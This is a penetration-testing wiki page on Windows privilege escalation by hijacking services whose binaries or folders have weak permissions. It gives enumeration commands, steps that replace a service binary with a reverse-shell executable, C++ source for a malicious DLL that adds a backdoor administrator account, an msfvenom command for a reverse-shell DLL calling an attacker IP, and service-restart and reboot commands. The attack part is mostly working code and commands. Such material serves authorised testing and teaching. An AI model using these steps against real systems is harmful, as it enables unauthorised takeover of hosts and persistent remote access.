Weak File/Folder Permissions

MITRE ATT&CK™ Hijack Execution Flow - Technique T1574

Theory

It is very often in Windows environments to discover services that run with SYSTEM privileges. If you have write permissions over the folder or binary used by the service you can use it to escalate you privileges.

Practice

Service Binary Hijacking

Given sufficient permissions over a service's binary, swapping it with our own binary enables us to gain code execution as the user configured to run this service.

To identify weaknesses in service binary permissions, we can take the following steps: retrieve a complete list of all service binary files, retrieve their permissions, identify specific ones for our controlled user.

We can perform such enumeration by using one of the following methods:

CMD

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt
for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

PowerShell

Get-WmiObject Win32_Service | ForEach-Object { $serviceName = $_.Name; $path = $_.PathName; $startName = $_.StartName; if ($path -ne $null -and $path -ne "") { $formattedPath = if ($path -match '.*\.exe') { if ($path -match '^"(.+?\.exe)') { $matches[1] } else { $path -replace '^(.*\.exe).*', '$1' } } else { $path }; $acl = try { Get-Acl -Path $formattedPath -ErrorAction Stop } catch { $null }; if ($acl -ne $null) { $relevantACE = $acl | Select-Object -ExpandProperty Access | Where-Object { $_.FileSystemRights -match 'Write|FullControl|Modify' }; if ($relevantACE) { [PSCustomObject]@{ ServiceName = $serviceName; FormattedPath = $formattedPath; StartName = $startName; ACL = $relevantACE | Select-Object -Property IdentityReference, FileSystemRights | Format-List | Out-String } } } } } | Sort-Object -Property FormattedPath -Unique | Format-List

PowerUp

. .\PowerUp.ps1
Get-ModifiableServiceFile

winPEAS

winPEASx64.exe servicesinfo

If we find an editable service binary, we can simply replace it with a malicious one as follow:

# Backup the binary
copy /y "c:\Program Files\File Permissions Service\filepermservice.exe" c:\Temp\filepermservice_backup.exe

# Hijack the binary 
copy /y c:\Temp\reverse.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

Then, restart the service to trigger the execution

#Using wmic
wmic service <Service_Name> call stopservice
wmic service <Service_Name> call startservice

#Using net
net stop <Service_Name> && net start <Service_Name>

#Using sc.exe
sc stop <Service_Name>
sc start <Service_Name>

If we can't restart the service, we may check if it has StartModeset to Auto.

If so, we can reboot the target to trigger the new binary (we will need the SeShutdownPrivilegefor that).

#Exemple of getting StartMode for MySVC
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'MySVC'}

#Reboot
shutdown /r /t 0

Service DLL Hijacking

DLL hijacking can be applied in many other cases, but this section focuses solely on services. For a more comprehensive approach, please refer to this page.

In case you have write permissions over the service binary folder, we can write our DLL in and then hijack the DLL search order. Here is the default DLL search order in windows (in safe mode which is the default):

The executable directory.
The system directory.
The 16-bit system directory.
The Windows directory.
The current directory.
The directories that are listed in the PATH environment variable.

We can enumerate permissive service folders by using the following PowerShell command

Get-WmiObject Win32_Service | ForEach-Object { $s = $_.Name; $p = $_.PathName; $start = $_.StartName; if ($p -ne $null -and $p -ne "") { $f = if ($p -match '.*\.exe') { if ($p -match '^"(.+\\)') { $matches[1] } else { $p -replace '^(.*\\).*', '$1' } } else { $p }; $a = try { (Get-Acl -Path $f -ErrorAction Stop).Access | Where-Object { $_.FileSystemRights -match 'Write|FullControl|Modify' } } catch { $null }; if ($a) { [PSCustomObject]@{ ServiceName = $s; StartName = $start; ExecutableFolder = $f; FolderACL = $a | Select-Object IdentityReference, FileSystemRights | Format-List | Out-String } } } } | Sort-Object -Property ExecutableFolder -Unique | Format-List

If we find a writable service folder, we first want to exfiltrate its service binary to a local windows machine. On this controlled computer, download Process Monitor (procmon) to monitor for missing or hijackable DLLs.

In procomon, specify this three filters (edit the service name with yours):

We may find some CreateFile actions with a NAME NOT FOUND result for a dll inside of the writable service binary folder. If so we can use this DLL name for DLL Hijacking !

If we've found a DLL we can hijack, the hard part is over. Now let's compile a custom DLL using the following code (in this example, the vulnerable DLL is named "hijackme.dll").

hijackme.cpp

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user pwned P@ssword! /add");
  	    i = system ("net localgroup administrators pwned /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

#Compile it
x86_64-w64-mingw32-gcc hijackme.cpp --shared -o hijackme.dll

Or use msfvenom to directly generate a malicious DLL.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<ATTACKING_PORT> EXITFUNC=thread -f dll -o hijackme.dll

Now, after transferring the DLL to the target host, copy the DLL to the path we found.

# Hijack the DLL 
copy /y c:\Temp\hijackme.dll "C:\Program Files\Folder Permissions Service\hijackme.dll"

Finaly, restart the service to trigger the execution

#Using wmic
wmic service <Service_Name> call stopservice
wmic service <Service_Name> call startservice

#Using net
net stop <Service_Name> && net start <Service_Name>

#Using sc.exe
sc stop <Service_Name>
sc start <Service_Name>

If we can't restart the service, we may check if it has StartModeset to Auto.

If so, we can reboot the target to trigger the new binary (we will need the SeShutdownPrivilegefor that).

#Exemple of getting StartMode for MySVC
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'MySVC'}

#Reboot
shutdown /r /t 0

Resources

PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Last updated 1 year ago